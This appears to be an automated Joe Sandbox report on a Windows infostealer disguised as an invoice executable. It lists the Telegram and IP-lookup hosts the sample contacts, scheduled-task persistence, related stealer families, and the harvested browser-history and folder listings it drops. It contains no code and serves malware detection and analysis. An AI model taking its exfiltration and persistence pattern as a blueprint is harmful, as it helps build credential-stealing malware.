149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582796
Start date and time:	2024-12-31 14:28:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice-BL. Payment TT $ 28,945.99.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@48/235@5/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 294 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:28:54	API Interceptor	7236882x Sleep call for process: Invoice-BL. Payment TT $ 28,945.99.exe modified
08:29:00	API Interceptor	17x Sleep call for process: powershell.exe modified
08:29:02	API Interceptor	4627130x Sleep call for process: SFHAWxtoIpgL.exe modified
13:29:00	Task Scheduler	Run new task: SFHAWxtoIpgL path: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	iviewers.dll	Get hash	malicious	LummaC	Browse
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse
	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse
104.16.184.241	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	icanhazip.com/
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	icanhazip.com/
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	icanhazip.com/
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	T05Dk6G8fg.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	VaXmr82RIb.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	icanhazip.com/
172.67.196.114	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.196.114
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse	172.67.196.114
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse	104.21.44.66
icanhazip.com	bPkG0wTVon.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	104.16.184.241
	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.184.241
	3gJQoqWpxb.bat	Get hash	malicious	Unknown	Browse	104.16.184.241
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.16.185.241
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	104.16.185.241
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	104.16.185.241
	7fE6IkvYWf.exe	Get hash	malicious	Unknown	Browse	104.16.184.241
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.185.241
api.telegram.org	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma Invoice.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	tg.exe	Get hash	malicious	Babadeda	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	iviewers.dll	Get hash	malicious	LummaC	Browse	149.154.167.220
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	149.154.167.220
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://linkenbio.net/59125/247	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
CLOUDFLARENETUS	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	MJhe4xWsnR.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	5EfYBe3nch.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc	Browse	104.21.96.1
	zhMQ0hNEmb.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	2RxMkSAgZ8.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Dl6wuWiQdg.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.112.1
	bzzF5OFbVi.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.196.114
	GYede3Gwn0.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	149.154.167.220 172.67.196.114
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220 172.67.196.114
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220 172.67.196.114
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.196.114
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	149.154.167.220 172.67.196.114
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	149.154.167.220 172.67.196.114
	Epsilon.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	846
Entropy (8bit):	5.348245554535445
Encrypted:	false
SSDEEP:	24:B+7htQty0nkF1k40Ffb4gpeP1ncNCg40vSF3FQtlR5tC:B+7hKtyx3P0t4goPom06BytX54
MD5:	0CCB4C12E6A341FE854CC9603FF3018A
SHA1:	1EF8037A637BAC5E5F7F622124DBA45CAFC34049
SHA-256:	BA4A258F14E2C07CE5F7C6B1369DD2E9114837500ADC9F4A388B6C574EA4C9F8
SHA-512:	10A545EAD81A35EBEA3805825528F7A60C3B855FD69E87F6DAE09D9FB75298FB858810442FFB145A910FB1220492D263A21D7525805EDD39E58289BD2A9A6C6C
Malicious:	false
Preview:	Desktop\...DTBZGIOOSO\....DTBZGIOOSO.docx....KATAXZVCPS.mp3....ONBQCLYSPU.pdf....UMMBDNEQBN.png....VLZDGUKUTZ.jpg....XZXHAVGRAG.xlsx...DVWHKMNFNN\...HTAGVDFUIE\...JSDNGYCOWY\...NIKHQAIQAU\...ONBQCLYSPU\....KATAXZVCPS.xlsx....LTKMYBSEYZ.pdf....ONBQCLYSPU.docx....RAYHIWGKDI.mp3....YPSIACHYXW.jpg....ZBEDCJPBEY.png...SQRKHNBNYN\...WKXEWIOTXI\...XZXHAVGRAG\....DVWHKMNFNN.jpg....KATAXZVCPS.pdf....NWTVCDUMOB.png....VLZDGUKUTZ.xlsx....XZXHAVGRAG.docx....YPSIACHYXW.mp3...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...Excel.lnk...Invoice-BL. Payment TT $ 28,945.99.exe...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.288315561090157
Encrypted:	false
SSDEEP:	24:n+7htQty0tkF1k40Ffb4gptx0cNCg40vSF3FQtlR5tC:n+7hKtyz3P0t4gZm06BytX54
MD5:	FC5EC224F499D2CCEBEA6DDCBA347110
SHA1:	F4959F47D1FE94F966D17B04FE7B13306815EB25
SHA-256:	9D7568FFA05E69315E0F9422D32557A4D80106B02FE9D330E10F25A933D528EE
SHA-512:	83158C4E4D3BB0BA8EDABCC2FB0837BBB201BA8267334C5085883BB4B88EDCFCB0AEAD25A006C6B27C485491D820249A37B561B80154E920E9AF72A7ADF9750C
Malicious:	false
Preview:	Documents\...DTBZGIOOSO\....DTBZGIOOSO.docx....KATAXZVCPS.mp3....ONBQCLYSPU.pdf....UMMBDNEQBN.png....VLZDGUKUTZ.jpg....XZXHAVGRAG.xlsx...DVWHKMNFNN\...HTAGVDFUIE\...JSDNGYCOWY\...My Music\...My Pictures\...My Videos\...NIKHQAIQAU\...ONBQCLYSPU\....KATAXZVCPS.xlsx....LTKMYBSEYZ.pdf....ONBQCLYSPU.docx....RAYHIWGKDI.mp3....YPSIACHYXW.jpg....ZBEDCJPBEY.png...SQRKHNBNYN\...WKXEWIOTXI\...XZXHAVGRAG\....DVWHKMNFNN.jpg....KATAXZVCPS.pdf....NWTVCDUMOB.png....VLZDGUKUTZ.xlsx....XZXHAVGRAG.docx....YPSIACHYXW.mp3...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.272373331532227
Encrypted:	false
SSDEEP:	6:3tSLKKBZbUcx0/xmT/Esl0/5hOLXovsvM7LLFEKTFQtlRo4r9adCyaS5UUJUsrQe:QLKKBptx0/U/FC/54L4vsvWnFEKTFQtu
MD5:	DA7F715DF404D5E9980389ECD8F23716
SHA1:	A8E28EBAF2340F5458764A45107897F610075941
SHA-256:	B7C4BA1F5DB7584FB05E9EE678A0A6D132E68A659A93FE79F452FE03BFC8E5B0
SHA-512:	6DE16DD7351FBAA303E5798E2F08D319A3A5E6A9BB996273D7D61F39569A3A594B30EE629FD3902268DF239B69D87AAF42B6BCFE3A15829EA42CBCE1023BCDDA
Malicious:	false
Preview:	Downloads\...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4020
Entropy (8bit):	5.3622686563974735
Encrypted:	false
SSDEEP:	96:4jzcRPTmt6qESf4QcNdKwrbIGV5GfcitVMAUMaaP905DlPvBadewq:BtbSw/NzUK7eq
MD5:	0AA7670308AEFF2AB035D90EA8D48C6D
SHA1:	C670FE73094406B2279284B3CAD5DA7DEB341151
SHA-256:	8F845BC3CDA0F3980ACC7FEFE5FDA1B65F27401536900A61B9CA842FC9663B4E
SHA-512:	1F33731099F9CAB0EAD670FC645B1101A4B2693906CE02F136A1A175B721EC56C18811C8F8159BF22CEC76EE291EAD2AFF249A318CE1D5E555AFC78C08F78B7C
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
